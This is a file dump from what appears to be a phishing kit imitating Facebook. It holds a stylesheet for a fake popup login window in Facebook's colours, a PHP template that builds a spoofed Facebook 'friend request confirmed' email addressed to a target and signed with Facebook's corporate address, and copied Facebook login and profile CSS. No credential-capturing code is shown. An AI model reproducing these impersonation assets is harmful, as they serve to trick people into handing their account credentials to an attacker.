145 |
146 |
147 |
148 |
149 |
150 |
151 |
--------------------------------------------------------------------------------
/promotion/style.css:
--------------------------------------------------------------------------------
1 | *
2 | {
3 | box-sizing: border-box;
4 | }
5 |
6 | @font-face {
7 | font-family: 'ubuntu';
8 | src: url('ubuntu.woff') format('woff');
9 | }
10 |
11 | body
12 | {
13 | margin: 0;
14 | padding: 0;
15 | font-family: 'ubuntu';
16 | padding-top: 15px;
17 | }
18 |
19 | header
20 | {
21 | width: 100%;
22 | text-align: center;
23 | display: flex;
24 | justify-content: center;
25 | align-self: center;
26 | background-color: #DBDBDB;
27 | }
28 |
29 | header img
30 | {
31 | width: 30%;
32 | display: inline-block;
33 | min-width: 200px;
34 | }
35 |
36 | header span
37 | {
38 | justify-content: center;
39 | align-self: center;
40 | }
41 |
42 | .intro
43 | {
44 | width: 70%;
45 | margin: auto;
46 | border: solid 1px black;
47 | margin-top: 30px;
48 | box-shadow: 0 0 10px black;
49 | padding-bottom: 20px;
50 | }
51 |
52 | .sign-in
53 | {
54 | padding: 20px;
55 | width: 70%;
56 | margin: auto;
57 | text-align: center;
58 | padding-top: 30px;
59 | }
60 |
61 | .sign-in img
62 | {
63 | width: 200px;
64 | cursor: pointer;
65 | }
66 |
67 | .top h1
68 | {
69 | font-size: 60px;
70 | }
71 |
72 | .login-window
73 | {
74 | position: absolute;
75 | top: 0;
76 | bottom: 0;
77 | left: 0;
78 | right: 0;
79 | background-color: rgba(0,0,0,0.3);
80 | display: flex;
81 | justify-content: center;
82 | align-self: center;
83 | font-family: 'lucida grande', tahoma, verdana, arial, sans-serif;
84 | }
85 |
86 | .inner-window
87 | {
88 | border: solid 10px #868686;
89 | border-radius: 10px;
90 | overflow: hidden;
91 | }
92 |
93 | .inner-window
94 | {
95 | justify-content: center;
96 | align-self: center;
97 | background-color: white;
98 | width: 50%;
99 | position: relative;
100 | }
101 |
102 | .banner
103 | {
104 | display: flex;
105 | align-self: center;
106 | width: 100%;
107 | text-align: left;
108 | background-color: #6D84B4;
109 | padding: 10px;
110 | }
111 |
112 | .road-banner
113 | {
114 | width: 100%;
115 | }
116 |
117 | .road-banner img
118 | {
119 | width: 100%;
120 | height: 20px;
121 | }
122 |
123 | .details
124 | {
125 | padding-top: 20px;
126 | padding-left: 20px;
127 | }
128 |
129 | .id-info
130 | {
131 | width: 350px;
132 | margin: auto;
133 | position: relative;
134 | min-width: 330px;
135 | }
136 |
137 | .id-info + .id-info
138 | {
139 | margin-top: 20px;
140 | }
141 |
142 | .id-info input, .id-info span
143 | {
144 |
145 | float: right;
146 | width: 200px;
147 | }
148 |
149 | .id-info input
150 | {
151 | border: solid 1px #CCCCCC;
152 | padding-top: 1px;
153 | padding-bottom: 1px;
154 | -webkit-appearance: none;
155 | -moz-appearance: none;
156 | appearance: none;
157 | -ms-appearance: none;
158 | mso-appearance: none;
159 | -o-appearance: none;
160 | -xv-appearance: none;
161 | -atsc-appearance: none;
162 | -wap-appearance: none;
163 | -khtml-appearance: none;
164 | -apple-appearance: none;
165 | -prince-appearance: none;
166 | -ah-appearance: none;
167 | -hp-appearance: none;
168 | -ro-appearance: none;
169 | -rim-appearance: none;
170 | -tc-appearance: none;
171 | }
172 |
173 | .id-info span a
174 | {
175 | text-decoration: none;
176 | }
177 |
178 | .id-info span a:hover
179 | {
180 | text-decoration: underline;
181 | }
182 |
183 | .footer
184 | {
185 | margin-top: 130px;
186 | width: 100%;
187 | border-top: solid 1px #CCCCCC;
188 | padding: 10px;
189 | position: relative;
190 | text-align: right;
191 | }
192 |
193 | .pvbutt
194 | {
195 | background-color: #4267B2;
196 | border: solid 1px #29487D;
197 | border-radius: 1px;
198 | color: white;
199 | font-size: 14px;
200 | font-family: helvetica, arial, sans-serif;
201 | padding-top: 3px;
202 | padding-bottom: 3px;
203 | font-weight: bold;
204 | cursor: pointer;
205 | -webkit-appearance: none;
206 | -moz-appearance: none;
207 | appearance: none;
208 | -ms-appearance: none;
209 | mso-appearance: none;
210 | -o-appearance: none;
211 | -xv-appearance: none;
212 | -atsc-appearance: none;
213 | -wap-appearance: none;
214 | -khtml-appearance: none;
215 | -apple-appearance: none;
216 | -prince-appearance: none;
217 | -ah-appearance: none;
218 | -hp-appearance: none;
219 | -ro-appearance: none;
220 | -rim-appearance: none;
221 | -tc-appearance: none;
222 | }
223 |
224 | .extra
225 | {
226 | background-color: #F6F7F9;
227 | border-color: #CED0D4;
228 | color: black;
229 | }
230 |
231 | @media (max-width: 800px)
232 | {
233 | .details
234 | {
235 | padding-left: 8px;
236 | }
237 |
238 | .head
239 | {
240 | padding-bottom: 20px;
241 | }
242 |
243 | .top h1
244 | {
245 | font-size: 40px;
246 | }
247 |
248 | .inner-window
249 | {
250 | width: 70%;
251 | }
252 |
253 | .sign-in
254 | {
255 | width: 100%
256 | }
257 |
258 | .intro
259 | {
260 | width: 100%;
261 | border:0;
262 | border-top: solid 1px black;
263 | border-bottom: solid 1px black;
264 | box-shadow: none
265 |
266 | }
267 |
268 | .sign-in
269 | {
270 | width: 100%;
271 | }
272 |
273 | .inner-window
274 | {
275 | width: 95%;
276 | }
277 | }
278 |
279 | @media (max-width: 400px)
280 | {
281 |
282 |
283 | .id-info
284 | {
285 | width: 100%;
286 | padding-right: 50px;
287 | }
288 |
289 | .id-info input, .id-info span
290 | {
291 | width: 100px;
292 | }
293 |
294 | .id-info span
295 | {
296 | font-size: 13px;
297 | }
298 | }
299 |
300 |
301 | @media (max-width: 300px)
302 | {
303 | .id-info
304 | {
305 | width: 100%;
306 | padding-right: 115px;
307 | }
308 |
309 | .id-info input
310 | {
311 | width: 70px;
312 | }
313 | }
--------------------------------------------------------------------------------
/croak/templates/confirmedyourfriendrequestfacebook.php:
--------------------------------------------------------------------------------
1 |
Facebook Maria confirmed the friend request. Maria has confirmed the friend request.
5 | This message was sent to '.$seperate_email.' . If you do not want to receive such emails from Facebook,
6 | unsubscribes . Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303
7 | ';if(!empty($_GET['view'])){echo $html;}
8 | ?>
--------------------------------------------------------------------------------
/dynamic/b5xUvEDTQ7c.css:
--------------------------------------------------------------------------------
1 | html,body{border:0}body.booklet{margin:0;padding:0;overflow:visible}#booklet{margin:0;padding:0}#booklet #content{border:0 solid white;float:none;margin:0;padding:0;width:auto}#booklet #pageheader{background:#365899;color:#fff}#booklet #pageheader #homelink{background:url(/rsrc.php/v3/yR/r/teE39sffXW8.png) no-repeat 10px 50%;color:#fff;margin:0;padding:8px 10px 8px 30px}#booklet #fbpageheader{background-color:#365899;border-bottom:1px solid #1a3878;height:34px}#booklet #fbpageheader #logo{float:left;background-image:url(/rsrc.php/v3/yN/r/CGJk-nrbfcs.png);background-repeat:no-repeat;background-size:auto;background-position:4px -33px;height:34px;width:96px}#booklet #fbpageheader a{color:#fff;display:inline-block;float:right;font-weight:bold;margin-top:6px}#booklet #fbpageheader a:hover,#booklet #fbpageheader a:focus,#booklet #fbpageheader a:active{background-color:#4267b2;outline:none;text-decoration:none}#booklet #dialog_buttons{padding:8px 10px}#booklet #dialog_buttons input{margin:2px}#booklet #pagefooter #pagefooter_links{width:auto}#booklet #pagefooter{width:auto;margin:0 auto}#booklet #pagefooter .copyright_and_location{width:auto}#booklet .status{margin:0}
2 | .login_page .title_header{margin:0 0 10px 0;padding:0 0 10px 0}.login_page .login_page_spacer{height:35px}.login_page .title_header h2.no_icon{background:transparent none repeat scroll 0%;margin:0;padding:0}.login_page #loginform{clear:left;margin:auto;padding:15px 0;text-align:left;width:380px}.login_page #signup_area{clear:left;margin:auto;width:380px}.login_page .signup_button{float:left}.login_page .fbLoginNuxTrackingPixel{display:inline;height:0;width:0}.login_page .signup_text{float:left;width:200px;margin:0 0 20px 10px}.login_page hr{width:280px;margin-left:0}.login_page #loginform p{line-height:16px;margin:10px 0;text-align:left}.login_page #loginform p.reset_password{margin-bottom:0;padding-bottom:0}.login_page .apinote{margin:10px auto;width:450px;background:#fff}.login_page .apinote h2{font-size:12px;margin-bottom:6px}.login_page .login_form_container .dialog_buttons{background-color:#f6f7f9;border-top:1px solid #ccc;bottom:0;left:0;margin:0;padding:8px 10px;position:absolute;right:0;text-align:right}.login_page .dialog_buttons .logged_in_as{float:left;width:240px;margin-top:3px;text-align:left}.login_page .dialog_buttons .register_link{float:left;text-align:left;margin-top:4px;font-weight:bold}.login_page #email{direction:ltr}.login_page #error{margin-top:20px}div.login_page_interstitial{margin-bottom:0;margin-top:0;width:640px}.login_page .login_message{margin:auto;width:640px}.login_page #booklet #content{float:none;margin-bottom:46px;padding:15px 30px 20px 30px;width:auto}.login_page #booklet #loginform{margin-top:20px;padding-top:0}.login_page #booklet #dialog_buttons input{margin:0}.form_row{padding:0 0 8px 0;text-align:left}.form_row .login_form_label{display:block;float:left;padding:3px 0;width:100px}.form_row input{margin:0}.form_row .inputtext,.inputpassword{width:175px}.form_row .checkbox{float:left;width:15px;margin:5px 4px 2px 0}.persistent{padding:3px 0 3px 100px;text-align:left}#login_button_inline{float:left;margin-bottom:5px;margin-right:5px}#register_link{margin-top:5px;float:left}#buttons{padding:5px 0 0 100px;text-align:left}#buttons .uiButton{margin-right:2px}#buttons label{float:none;width:auto}.reset_password,.not_me_link{padding-left:100px}.reset_password label{float:none;font-weight:normal;width:auto}.reset #content{padding:20px}.login_error_box{margin-top:10px}.login_page_private{background-color:#191919}.login_page_private a{color:#fff}
3 | ._30ny{padding:80px 0}
4 | ._4rbf{color:#fff;font-size:13px;max-width:300px;padding:8px}._1vu8:not(:focus){background:#ffffff url(/rsrc.php/v3/y6/r/eFrKTvRvpX9.png) no-repeat right 8px center;border:1px solid #fa3e3e}.x1-5 ._1vu8:not(:focus),.x2 ._1vu8:not(:focus){background-image:url(/rsrc.php/v3/yu/r/ihdxZr4UqO6.png);background-size:18px 18px}._4rer:not(:focus){background:#ffffff url(LrAUrow-LXX.png) no-repeat right 8px center;border:1px solid;border-color:#8b0300;border-radius:3px}.x1-5 ._4rer:not(:focus),.x2 ._4rer:not(:focus){background-image:url(/rsrc.php/v3/ym/r/m-sSi7fNQdd.png);background-size:18px 18px}
5 | html ._44mg{padding:6px 0;width:302px}html ._1kbt._1kbt{font-size:14px;padding:5px 8px;width:284px}
6 | ._39il.login_page #loginform{padding:0;text-align:center}._39il.login_page .persistent{padding:18px 0;text-align:center}._1w1t{margin:auto;padding:22px 108px 26px;width:396px}._1uxu{margin:auto;width:612px}._39il ._52e0{font-size:14px;width:252px}._xkt{padding:6px 0}._xku{padding:18px 0}._5466{margin:auto}._xkv{padding:6px 0}._42w_{margin:0 auto 40px;width:640px}._wp9{padding:6px 0}.login_page_private ._42w_ a.showMore{background-color:#191919}
7 | ._k0{width:100%}._k0 td{padding:5px 4px 7px 4px}._k1:hover{background:#e9ebee}._k2{padding-left:25px}._k3{border-right:1px solid #e8ebf3;width:75%}table._k4 tr td{padding-right:20px}table._k4 tr td input{font-size:40px}._5dr0{font-size:40px}._ye{padding-left:25px;padding-top:25px;width:50%}._41sx ._41sy{border-right-width:0}._41sx ._41s-{border-radius:0;height:22px;line-height:20px}
8 | .fbLoggedOutAccountBlock td{vertical-align:middle}.fbLoggedOutAccountInfo{width:10000px}.fbLoggedOutAccountAuxContent{text-align:right;width:50%}
9 | .uiInterstitial{border-radius:4px;margin-left:auto;margin-right:auto}.uiInterstitialSmall{width:445px}.uiInterstitialLarge{width:555px}.uiInterstitial .interstitialHeader{border-color:#ccc;padding-bottom:.5em}.fullBleed .interstitialHeader{margin:0;padding:4px 12px 10px}.uiInterstitialContent{margin-bottom:15px}.fullBleed .uiInterstitialContent{margin:0;padding:0}.uiInterstitialBar{border-bottom-right-radius:3px;border-bottom-left-radius:3px;-moz-border-radius:0 0 3px 3px;line-height:16px;padding:8px 10px}div.uiInterstitialWithStripes{background:transparent url(/rsrc.php/v3/y9/r/y7MG8IZpiC8.gif) repeat-x;padding-top:15px}
10 |
11 | #bootloader_g0mSI{height:42px;}.bootloader_g0mSI{display:block!important;}
--------------------------------------------------------------------------------
/dynamic/b5xUvEDTQ7c2.css:
--------------------------------------------------------------------------------
1 | html,body{border:0}body.booklet{margin:0;padding:0;overflow:visible}#booklet{margin:0;padding:0}#booklet #content{border:0 solid white;float:none;margin:0;padding:0;width:auto}#booklet #pageheader{background:#365899;color:#fff}#booklet #pageheader #homelink{background:url(/rsrc.php/v3/yR/r/teE39sffXW8.png) no-repeat 10px 50%;color:#fff;margin:0;padding:8px 10px 8px 30px}#booklet #fbpageheader{background-color:#365899;border-bottom:1px solid #1a3878;height:34px}#booklet #fbpageheader #logo{float:left;background-image:url(/rsrc.php/v3/yN/r/CGJk-nrbfcs.png);background-repeat:no-repeat;background-size:auto;background-position:4px -33px;height:34px;width:96px}#booklet #fbpageheader a{color:#fff;display:inline-block;float:right;font-weight:bold;margin-top:6px}#booklet #fbpageheader a:hover,#booklet #fbpageheader a:focus,#booklet #fbpageheader a:active{background-color:#4267b2;outline:none;text-decoration:none}#booklet #dialog_buttons{padding:8px 10px}#booklet #dialog_buttons input{margin:2px}#booklet #pagefooter #pagefooter_links{width:auto}#booklet #pagefooter{width:auto;margin:0 auto}#booklet #pagefooter .copyright_and_location{width:auto}#booklet .status{margin:0}
2 | .login_page .title_header{margin:0 0 10px 0;padding:0 0 10px 0}.login_page .login_page_spacer{height:35px}.login_page .title_header h2.no_icon{background:transparent none repeat scroll 0%;margin:0;padding:0}.login_page #loginform{clear:left;margin:auto;padding:15px 0;text-align:left;width:380px}.login_page #signup_area{clear:left;margin:auto;width:380px}.login_page .signup_button{float:left}.login_page .fbLoginNuxTrackingPixel{display:inline;height:0;width:0}.login_page .signup_text{float:left;width:200px;margin:0 0 20px 10px}.login_page hr{width:280px;margin-left:0}.login_page #loginform p{line-height:16px;margin:10px 0;text-align:left}.login_page #loginform p.reset_password{margin-bottom:0;padding-bottom:0}.login_page .apinote{margin:10px auto;width:450px;background:#fff}.login_page .apinote h2{font-size:12px;margin-bottom:6px}.login_page .login_form_container .dialog_buttons{background-color:#f6f7f9;border-top:1px solid #ccc;bottom:0;left:0;margin:0;padding:8px 10px;position:absolute;right:0;text-align:right}.login_page .dialog_buttons .logged_in_as{float:left;width:240px;margin-top:3px;text-align:left}.login_page .dialog_buttons .register_link{float:left;text-align:left;margin-top:4px;font-weight:bold}.login_page #email{direction:ltr}.login_page #error{margin-top:20px}div.login_page_interstitial{margin-bottom:0;margin-top:0;width:640px}.login_page .login_message{margin:auto;width:640px}.login_page #booklet #content{float:none;margin-bottom:46px;padding:15px 30px 20px 30px;width:auto}.login_page #booklet #loginform{margin-top:20px;padding-top:0}.login_page #booklet #dialog_buttons input{margin:0}.form_row{padding:0 0 8px 0;text-align:left}.form_row .login_form_label{display:block;float:left;padding:3px 0;width:100px}.form_row input{margin:0}.form_row .inputtext,.inputpassword{width:175px}.form_row .checkbox{float:left;width:15px;margin:5px 4px 2px 0}.persistent{padding:3px 0 3px 100px;text-align:left}#login_button_inline{float:left;margin-bottom:5px;margin-right:5px}#register_link{margin-top:5px;float:left}#buttons{padding:5px 0 0 100px;text-align:left}#buttons .uiButton{margin-right:2px}#buttons label{float:none;width:auto}.reset_password,.not_me_link{padding-left:100px}.reset_password label{float:none;font-weight:normal;width:auto}.reset #content{padding:20px}.login_error_box{margin-top:10px}.login_page_private{background-color:#191919}.login_page_private a{color:#fff}
3 | ._30ny{padding:80px 0}
4 | ._4rbf{color:#fff;font-size:13px;max-width:300px;padding:8px}._1vu8:not(:focus){background:#ffffff url(/rsrc.php/v3/y6/r/eFrKTvRvpX9.png) no-repeat right 8px center;border:1px solid #fa3e3e}.x1-5 ._1vu8:not(:focus),.x2 ._1vu8:not(:focus){background-image:url(/rsrc.php/v3/yu/r/ihdxZr4UqO6.png);background-size:18px 18px}._4rer:not(:focus){background:#ffffff url(/rsrc.php/v3/y_/r/LrAUrow-LXX.png) no-repeat right 8px center;border:1px solid;border-color:#8b0300;border-radius:3px}.x1-5 ._4rer:not(:focus),.x2 ._4rer:not(:focus){background-image:url(/rsrc.php/v3/ym/r/m-sSi7fNQdd.png);background-size:18px 18px}
5 | html ._44mg{padding:6px 0;width:302px}html ._1kbt._1kbt{font-size:14px;padding:5px 8px;width:284px}
6 | ._39il.login_page #loginform{padding:0;text-align:center}._39il.login_page .persistent{padding:18px 0;text-align:center}._1w1t{margin:auto;padding:22px 108px 26px;width:396px}._1uxu{margin:auto;width:612px}._39il ._52e0{font-size:14px;width:252px}._xkt{padding:6px 0}._xku{padding:18px 0}._5466{margin:auto}._xkv{padding:6px 0}._42w_{margin:0 auto 40px;width:640px}._wp9{padding:6px 0}.login_page_private ._42w_ a.showMore{background-color:#191919}
7 | ._k0{width:100%}._k0 td{padding:5px 4px 7px 4px}._k1:hover{background:#e9ebee}._k2{padding-left:25px}._k3{border-right:1px solid #e8ebf3;width:75%}table._k4 tr td{padding-right:20px}table._k4 tr td input{font-size:40px}._5dr0{font-size:40px}._ye{padding-left:25px;padding-top:25px;width:50%}._41sx ._41sy{border-right-width:0}._41sx ._41s-{border-radius:0;height:22px;line-height:20px}
8 | .fbLoggedOutAccountBlock td{vertical-align:middle}.fbLoggedOutAccountInfo{width:10000px}.fbLoggedOutAccountAuxContent{text-align:right;width:50%}
9 | .uiInterstitial{border-radius:4px;margin-left:auto;margin-right:auto}.uiInterstitialSmall{width:445px}.uiInterstitialLarge{width:555px}.uiInterstitial .interstitialHeader{border-color:#ccc;padding-bottom:.5em}.fullBleed .interstitialHeader{margin:0;padding:4px 12px 10px}.uiInterstitialContent{margin-bottom:15px}.fullBleed .uiInterstitialContent{margin:0;padding:0}.uiInterstitialBar{border-bottom-right-radius:3px;border-bottom-left-radius:3px;-moz-border-radius:0 0 3px 3px;line-height:16px;padding:8px 10px}div.uiInterstitialWithStripes{background:transparent url(/rsrc.php/v3/y9/r/y7MG8IZpiC8.gif) repeat-x;padding-top:15px}
10 |
11 | #bootloader_g0mSI{height:42px;}.bootloader_g0mSI{display:block!important;}
--------------------------------------------------------------------------------
/dynamic/profile_files/9Rq-JGKYDSd.css:
--------------------------------------------------------------------------------
1 | ._5e7- th.label{color:#999;font-weight:bold;line-height:15px;text-align:left;vertical-align:top;width:90px;word-wrap:break-word}._5e7- td.data{line-height:15px;width:100%}._5e7- td.rightCol{padding:3px 0 0 35px;text-align:right;width:50px}._5e7- .fbProfileExperience .experienceTitle{font-weight:normal}._5e7- .sampleImageCaption{text-align:center;width:50px;word-wrap:break-word}._5e7- .uiInfoTable .label{color:#666;font-size:11px;font-weight:normal;padding-top:0}._5jsb:hover{background:#f6f7f9}._5pty ._5jsb:hover{background:inherit}._5pty ._3l7w{display:none}._5e7- .uiInfoTable .data{padding-top:0}._5e7- .throbber{display:none}._5e7- .async_saving .throbber{display:block}table._5e7-{margin:0 10px 5px;width:379px}._5e7- ._480u{line-height:15px;padding-top:4px}._5e7- th._3sts{color:#999;font-weight:normal;line-height:15px;text-align:left;vertical-align:top;width:79px;word-wrap:break-word}
2 | ._5pbz{border-top:1px solid #e9e9e9;margin-top:12px;padding-top:10px}._5va0{border-top:0;margin-top:10px;padding-top:0}._5va1{border:1px solid #e5e5e5;border-radius:3px;margin:12px}._5pbz ._5pcr{position:relative}._114d ._5q5v{margin-bottom:15px}._5va0 ._44b2{display:block;line-height:32px;text-align:center}._4a8j ._44b2{display:block;font-weight:bold;line-height:40px;text-align:center}._1ojm{margin-top:-8px}._5va0 ._44b2:hover{background-color:#f6f7f9;border-radius:2px;text-decoration:none}._4a8j ._44b2:hover{background-color:#f6f7f9;border-radius:2px;text-decoration:none}._m76{margin-left:5px}
3 | ._3stn{border:0;border-collapse:collapse;border-spacing:0;table-layout:fixed;width:100%}._3sto td{padding:5px 0}._3stp ._3sto td{padding:0;visibility:hidden}._480u,._480v,._3sts{padding:3px 0 1px 0;text-align:left;vertical-align:top}._3stt ._480u,._3stt ._480v{padding-top:5px}._480u>input,._480u>label input,._480v>input,._480v>label input{margin-left:0}._3stt ._3sts{padding-top:8px}._3sts ._3stu{color:#999}._480v{padding:0 0 0 20px;width:225px}._3sts{color:#666;font-weight:bold;padding-right:10px;text-align:right;width:130px;word-wrap:break-word}
4 | .uiCollapsedList .visible{margin-right:10px}.uiCollapsedListHidden .showAll{list-style-type:none}.uiCollapsedListVisible .showAll,.uiCollapsedListHidden .hiddenItem{display:none}.uiCollapsedListNoSeparate .visible{margin-right:3px}.uiCollapsedListVisible .visible,.uiCollapsedListMiddot .visible{margin-right:0}
5 | ._5dwa{line-height:12px;padding:8px 0 7px;position:relative}._5dw9._5dwa{min-height:24px}._5dw9 span._38my{line-height:28px;margin-left:12px;padding:0}._5dw9 ._38my{color:#1d2129;font-size:14px;font-weight:bold}._5dw9 ._5dw8{line-height:28px}._5dw9 ._45hc:first-child{border:0}._5dw9 ._45hc{border-left:1px solid #dddfe2}._5dw9 ._45hc a{color:#4b4f56;font-weight:normal;padding:6px 12px}._5dw9 ._45hc:hover a,._5dw9 ._1hqh a{color:#1d2129}._5dw9 ._45hc ._c1c{bottom:-5px;height:3px;left:-1px;margin-bottom:-3px;padding:0 13px;right:-1px}._5dw9 ._45hc:hover ._c1c{background:#c4d2e7}._5dwb ._38my{color:#90949c;font-weight:bold;margin-left:18px;padding:0;text-decoration:none;text-transform:uppercase}._5dwb ._38my:first-child{margin-left:12px}._5dwb._3s3z ._3s3-{border-bottom:1px solid #e9ebee;bottom:-1px;left:0;margin:0 12px;position:absolute;right:0}html ._5dwa._5dwb{border-top:none}._5dwa._5dwb+div{border-top:none}._5dwb ._45hc a{color:#90949c}._5dwb ._45hc:hover a,._5dwb ._1hqh a{color:#4b4f56}._5dwb ._45hc ._c1c{bottom:-6px;height:2px;left:0;margin-bottom:-2px;right:0;z-index:1}._5dwb ._45hc:hover ._c1c{background:#9cb4d8}._5dwb ._45hc._1hqh ._c1c{background:#365899}._c1b{bottom:-1px;color:#7f7f7f;display:inline-block;font-size:11px;font-weight:normal;padding-left:2px;position:relative;vertical-align:top}._5dw7{color:#90949c;margin-left:12px}._38my{color:#4b4f56}._5dw7,._38my{font-size:11px}._1hqh._38my a{font-weight:bold}._5dw8{display:block;float:right;line-height:13px;margin:0 12px}._5dw8 a{font-size:12px}._5dwa ._45hc a:hover{text-decoration:none}._5dwa ._45hc ._c1c{display:none;position:absolute}._5dwa ._45hc:hover ._c1c{display:block}._5dwa ._45hc._1hqh ._c1c{background:#365899;display:block;z-index:1}
6 | ._5vx1.fixed_elem{border-top:0;border-top-left-radius:0;border-top-right-radius:0}._5vx2{background-clip:padding-box;box-sizing:border-box}._5vx2.fixed_elem{z-index:300}._5vx2._5vx6._51j8{border-color:rgba(0, 0, 0, .16) #dddfe2;box-shadow:0 1px 4px rgba(0, 0, 0, .06)}._5vx7{vertical-align:middle}._5vx7 ._1b0::after{content:' \25be'}._5vx7 ._45hd a,._5vwz a{color:#4b4f56;display:inline-block;vertical-align:baseline}._5vwz ._13xf{background-color:#c4d2e7;display:none;height:0;padding-top:3px}._5vx7 ._45hd:hover a,._5vwz:hover a{text-decoration:none}._5vwy a{color:#1d2129;font-weight:bold}._5vwy>span{display:block;position:relative}._13xf{display:none}._5vwy ._13xf,._5vwz:hover ._13xf{display:block}._2d2c ._5vwy ._13xf{background-color:#e9ebee}._4_np ._5vwy ._13xf{background-color:#e9ebee}._4_nr ._5vwy ._13xf{background-color:#f6f7f9}._4_ns ._5vwy ._13xf{background-color:#fa3e3e}._4_nv ._5vwy ._13xf{background-color:#42b72a}._4_nz ._5vwy ._13xf{background-color:#dddfe2}._5-f ._5vwy ._13xf{background-color:#fff}._5vx7 ._45hd{cursor:pointer;text-decoration:none}._5vw-._54nq{left:3px;position:relative}._5vw- ._5vwz{display:block}._5vx4 ._4jq5,._5vx4 ._45hd ._45hc{border-left:#e9ebee solid 1px;font-size:14px;margin:8px 0;padding:6px 16px 3px}._5vx4 ._5vwz:first-child ._4jq5{border-left:0}._5vx4._5vx6 ._5vwy ._13xf{background:#3b5998}._5vx4 ._5vwz ._13xf{bottom:-1px;left:13px;position:absolute;right:13px}._5vx4._5vx5 ._5vwy ._13xf{background-image:url(/rsrc.php/v3/yg/r/7VOHuJjTzs5.png);background-repeat:no-repeat;background-size:auto;background-position:0 -17px;height:8px;left:50%;margin-left:-7px;margin-top:0;padding-top:0;right:auto;width:14px}
7 | ._58zy{background:#e9ebee;border:1px solid #9cb4d8;border-radius:2px;color:#162643;cursor:default;float:left;height:1.3em;margin:0 2px 2px 0;padding:0 18px 0 3px;position:relative;white-space:nowrap}._12l9{padding-right:3px}._58zx{display:inline-block;margin:0;position:absolute;right:2px;top:3px}._58zy span{display:inline-block;max-width:401px;overflow:hidden;text-overflow:ellipsis}
8 |
9 | #bootloader_y6V42{height:42px;}.bootloader_y6V42{display:block!important;}
--------------------------------------------------------------------------------
/dynamic/mia/LgG-l-QCJkn.css:
--------------------------------------------------------------------------------
1 | ._7m2{height:137px;left:0;position:absolute;top:0;width:100%}._h5y{height:137px;overflow:hidden}._7lj{height:155px;position:relative;top:-11px;width:370px}._7m4{background:url(/rsrc.php/v3/yG/r/8RHv8nDQAHL.png) repeat-x left top;bottom:0;height:93px;position:absolute;width:100%}._ttk{display:none}._53ih ._ttk{border-left:1px solid rgba(0, 0, 0, .25);border-top:1px solid rgba(0, 0, 0, .25);display:block;height:11.31px;overflow:hidden;position:absolute;top:0;width:11.31px}._53ih._2uy0 ._ttk{background-color:#fff}._53ih._2uy0 ._ttk ._7li{display:none}._ttk ._7lj{top:0}._53ih ._ttk,._53ih ._ttk ._7lj,._53ih ._ttk ._1ubp{transform-origin:0 0}._7lf._53ih ._ttk,._7lf._53ih ._ttk ._7lj,._7lf._53ih ._ttk ._1ubp{transform-origin:100% 0}._1ubp{display:none}.MediaTagHovercardStage ._1ubp{background-color:rgba(0, 0, 0, .5);display:block;height:11px;left:0;position:absolute;top:0;width:24px}
2 | ._7ll{max-width:350px;min-width:75px}._1354{display:inline-block;font-size:0;margin-right:5px;vertical-align:middle}._5hzg{min-width:120px}._7lm{max-width:275px}._7ln{max-width:240px}._2-f7{display:inline-block;line-height:1.15;position:relative}._2-f8{margin-right:20px;margin-top:-2px}._2ls_{color:#fff;font-size:16px;font-weight:600;letter-spacing:0;line-height:18px;text-shadow:0 0 2px rgba(0, 0, 0, .3)}._2lt0{color:#fff;font-size:12px;font-weight:300;letter-spacing:1px;line-height:18px;text-shadow:0 0 2px rgba(0, 0, 0, .3)}._2-f9{position:absolute;right:2px;top:-2px}._2-fa{position:relative}._7lk{box-sizing:border-box;padding:10px;width:275px}._7lu ._50hf,._7lu .pageByline{color:#90949c}._7ls{margin-right:10px}._7lt{width:350px}._7lt ._7lu{margin-top:78px;position:relative}._5fyi{display:inline-block;height:20px}._5fyj{background-color:rgba(0, 0, 0, .5);border-radius:2px 2px 0 0;box-sizing:border-box;left:0;padding:5px 0 5px 5px;position:absolute;top:0;width:100%}._5fyj .hovercardContent .fcg,._5fyk{color:#fff;font-size:11px}._53ij ._4g4y .uiBoxGray{border-color:#d3d6db}._4g4y{left:-10px;margin-bottom:-10px;margin-top:10px;position:relative;width:370px}._7lv{width:100%}._7lt ._7lv{padding-top:46px}._7lt ._7ln a,._7lt ._7lx .uiLinkSubtle,._7lt ._7lx ._50hf,._7lt .pageCityLink,._7lt ._7lx .pageByline,._7lt .fanCount{color:#fff}._7lt ._50hf{margin-right:4px}._7lt ._7ls{background:#fff;background:rgba(0, 0, 0, .3);border-radius:3px;box-shadow:0 1px 1px rgba(0, 0, 0, .07);margin:0 7px -4px -4px;padding:1px}._7lt ._7lw{background-color:#fff;border:3px solid #fff;border-radius:2px;display:block;height:100px}._4lnn{display:block}._7lt ._7lx{bottom:3px;left:120px;line-height:1.2;margin-right:3px;max-width:250px;min-height:37px;position:absolute;z-index:1}._7lt ._7ln{max-width:250px}._7ln a._5f2m{color:rgba(255,255,255,.68)}._4yu6{padding-left:6px}._4yu7{position:relative;top:2px}._4aez{display:inline-block}
3 | ._4p0v{background-color:#fff;border-radius:4px;box-shadow:0 0 4px rgba(0, 0, 0, .2);font-size:12px;left:40%;max-width:300px;opacity:.96;padding:8px;position:fixed;z-index:401}
4 | ._1fa6{border-radius:2px;height:36px;position:relative}._1wqb,._1wqb ._3fbq,._1wqb ._5wkw,._1wqb ._3fbp._58ak,._1wqb ._3fbp,.gecko.mac ._1fa6._1wqb ._3fbp{background:#f6f7f9}.gecko.mac ._1fa6 ._3fbp,._1fa6 ._3fbp{background:#fff;border:0;margin:5px 0;padding:5px 2px;width:260px}._1fa6 ._3fbp ._58al{font-size:14px}._1fa6 ._3fbq{background:#fff;border:0;height:100%;margin:0}.gecko.mac ._1fa6 ._5wkw,._1fa6 ._5wkw{background:#fff;border:0;box-shadow:none;position:absolute;right:4px;top:7px}._1fa6 .uiSearchInput{border:0}._1fa6 .uiSearchInput input{max-width:100px;width:100%}._1fa6 .uiSearchInput span{border-top:none;padding:3px 0 2px 0}._1fa6 .uiSearchInput button{margin:1px 1px 0 0}
5 | ._4lh ._1xw{box-shadow:0 1px 3px -1px rgba(0, 0, 0, .15)}._4lh ._1xw{border:0}._1xw{background:#f6f7f9;border:1px solid #c4d2e7;display:block;margin-bottom:12px}._1xw:hover{text-decoration:none}._1xv{min-width:99px}
